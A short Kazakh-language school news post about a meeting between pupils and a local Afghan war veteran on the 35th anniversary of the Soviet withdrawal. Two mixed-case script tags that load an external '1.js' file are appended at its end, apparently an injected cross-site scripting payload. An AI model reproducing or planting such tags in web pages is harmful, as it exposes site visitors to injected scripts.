Бүгін Қарашілік ауылының ЖОББ мектебінде Кеңес әскерін Ауған жерінен шығарылғанына 35 жыл толуына орай, «Ауған, сөнген шоқ, өшкен арман, тек сенен есте қалған» атты ауған соғысы ардагері, жерлесіміз Рахимов Болат Балташұлымен кездесу өткізілді. Мақсаты: Оқушыларға Ауған соғысы жайлы толық мәлімет беру, ардагер ағамен ашық әңгімелесу, сұхбаттасу; Өз Отанына шексіз берілген, патриоттық рухы жоғары, қайсар жауынгер ағалардың ерлігін үлгі ету; Өскелең ұрпақ бойына әскери-патриоттық рухты сіңіру барысында қосқан үлесі үшін Болат Балташұлына мектеп ұжымы атынан алғысымызды білдіреміз! Еліміз аман, заманымыз тыныш болсын! Ұйымдастырушы: АӘТД мұғалімі Темиров А.С.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>